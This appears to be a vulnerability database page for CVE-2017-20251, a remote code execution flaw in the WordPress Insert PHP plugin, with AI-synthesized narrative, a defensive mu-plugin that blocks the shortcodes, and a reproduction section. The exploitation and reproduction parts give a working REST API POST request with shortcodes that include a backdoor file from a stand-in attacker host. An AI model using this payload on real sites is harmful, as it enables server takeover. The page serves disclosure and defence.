CVE-2017-20251
Description
WordPress Insert PHP plugin versions prior to 3.3.1 allow unauthenticated attackers to execute arbitrary PHP code via the REST API.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
WordPress Insert PHP plugin versions before 3.3.1 contain a PHP code injection vulnerability. This flaw allows unauthenticated attackers to execute arbitrary PHP code by injecting malicious shortcodes through the WordPress REST API. The vulnerability is reachable by sending POST requests to the wp-json/wp/v2/posts endpoint with crafted content containing insert_php shortcodes [2, 3].
Exploitation
An unauthenticated attacker can exploit this vulnerability by sending a POST request to the WordPress REST API's posts endpoint (wp-json/wp/v2/posts). The request body should contain crafted content with insert_php shortcodes that include and execute remote PHP files on the server. For example, an attacker could use a payload like [insert_php] include('http://evilhost.com/file/backdoor.php'); [/insert_php] [3].
Impact
Successful exploitation of this vulnerability allows an attacker to execute arbitrary PHP code on the server. This can lead to remote code execution (RCE), enabling the attacker to compromise the confidentiality, integrity, and availability of the affected WordPress site [2, 3].
Mitigation
Versions of the WordPress Insert PHP plugin prior to 3.3.1 are affected. The fixed version is 3.3.1. Users are strongly advised to update to version 3.3.1 or later to mitigate this vulnerability. No other mitigation or workaround details are available in the provided references [2].
AI Insight generated on Jun 9, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products: 1
Patches: 0 (no patches discovered yet).
Vulnerability mechanics
Root cause
"The plugin improperly processes shortcodes within the WordPress REST API, allowing arbitrary PHP code execution."
Attack vector
Unauthenticated attackers can exploit this vulnerability by sending POST requests to the `/wp-json/wp/v2/posts` endpoint. The request body should contain crafted content with `[insert_php]` or `[php]` shortcodes. These shortcodes can include commands to include and execute remote PHP files on the server, leading to arbitrary code execution [ref_id=1].
Affected code
The vulnerability exists in versions of the Insert PHP plugin prior to 3.3.1. The issue specifically relates to how the plugin handles shortcodes when content is submitted via the WordPress REST API, particularly through the `/wp-json/wp/v2/posts` endpoint [ref_id=1].
What the fix does
The advisory does not specify the exact changes made in version 3.3.1; it states only that the vulnerability is fixed in that version. The fix most likely involves sanitizing or properly escaping content processed through the REST API so that malicious shortcodes and the PHP files they include are no longer executed.
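Because the advisory gives no fix details, the following is an added hardening example (not the Insert PHP plugin's own patch) that a site operator could drop into wp-content/mu-plugins/ to reject any post submitted through the wp/v2/posts REST endpoint whose content carries an `[insert_php]` or `[php]` shortcode, the vector described above. `rest_pre_insert_post`, `get_shortcode_regex` and `WP_Error` are standard WordPress APIs; the function names, constant and error code are assumptions for this example.

```php
<?php
/**
 * Plugin Name: Block PHP shortcodes in REST-submitted content (hardening example)
 *
 * Added example, not the Insert PHP plugin's own fix. Placed in
 * wp-content/mu-plugins/ it loads before regular plugins and refuses any
 * post created or updated via wp/v2/posts whose content contains an
 * [insert_php] or [php] shortcode (the CVE-2017-20251 vector).
 */

// Shortcode tags registered by the Insert PHP plugin, per the advisory text.
const BLOCK_PHP_SHORTCODE_TAGS = array( 'insert_php', 'php' );

/**
 * True when $content contains any blocked shortcode. WordPress's own
 * shortcode regex is used so variants such as [php foo="bar"] or
 * [insert_php ] are matched the same way the plugin would parse them.
 */
function block_php_shortcode_present( $content ) {
    if ( ! is_string( $content ) || false === strpos( $content, '[' ) ) {
        return false;
    }
    $pattern = get_shortcode_regex( BLOCK_PHP_SHORTCODE_TAGS );
    return (bool) preg_match( '/' . $pattern . '/s', $content );
}

/**
 * Runs on rest_pre_insert_post before the post is written. Returning a
 * WP_Error makes the REST controller abort the request with the given status.
 */
function block_php_shortcode_rest_filter( $prepared_post, $request ) {
    $fields = array( 'post_content', 'post_excerpt', 'post_title' );
    foreach ( $fields as $field ) {
        if ( isset( $prepared_post->$field ) && block_php_shortcode_present( $prepared_post->$field ) ) {
            // Audit trail for incident response: which field and which source IP.
            error_log( sprintf(
                'Blocked PHP shortcode in REST field %s from %s',
                $field,
                $_SERVER['REMOTE_ADDR'] ?? 'unknown'
            ) );
            return new WP_Error(
                'rest_php_shortcode_blocked',
                'PHP shortcodes are not accepted through the REST API.',
                array( 'status' => 403 )
            );
        }
    }
    return $prepared_post;
}
add_filter( 'rest_pre_insert_post', 'block_php_shortcode_rest_filter', 10, 2 );
```

The `error_log` line gives defenders a searchable marker in the PHP error log; updating the plugin to 3.3.1 or later remains the actual remediation.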
Preconditions
- auth: The attacker does not require any authentication.
- network: The attacker can reach the WordPress REST API over the network.
- input: The attacker must be able to craft a POST request with specific shortcodes.
Reproduction
POST http://localhost.com/wp-json/wp/v2/posts/1234 HTTP/1.1
Host: localhost.com
User-Agent: Xploit
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.8
Accept-Encoding: gzip,deflate,lzma,sdch
Connection: keep-alive
content-type: application/json

{
  "id": "1234ffff",
  "title": "by Hacker",
  "content": "[insert_php] include('http[:]//evilhost.com/file/backdoor.php'); [/insert_php][php] include('http[:]//evilhost.com/file/backdoor.php'); [/php]"
}
[ref_id=1]
Generated on Jun 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References: 3
News mentions: 0 (no linked articles in our index yet).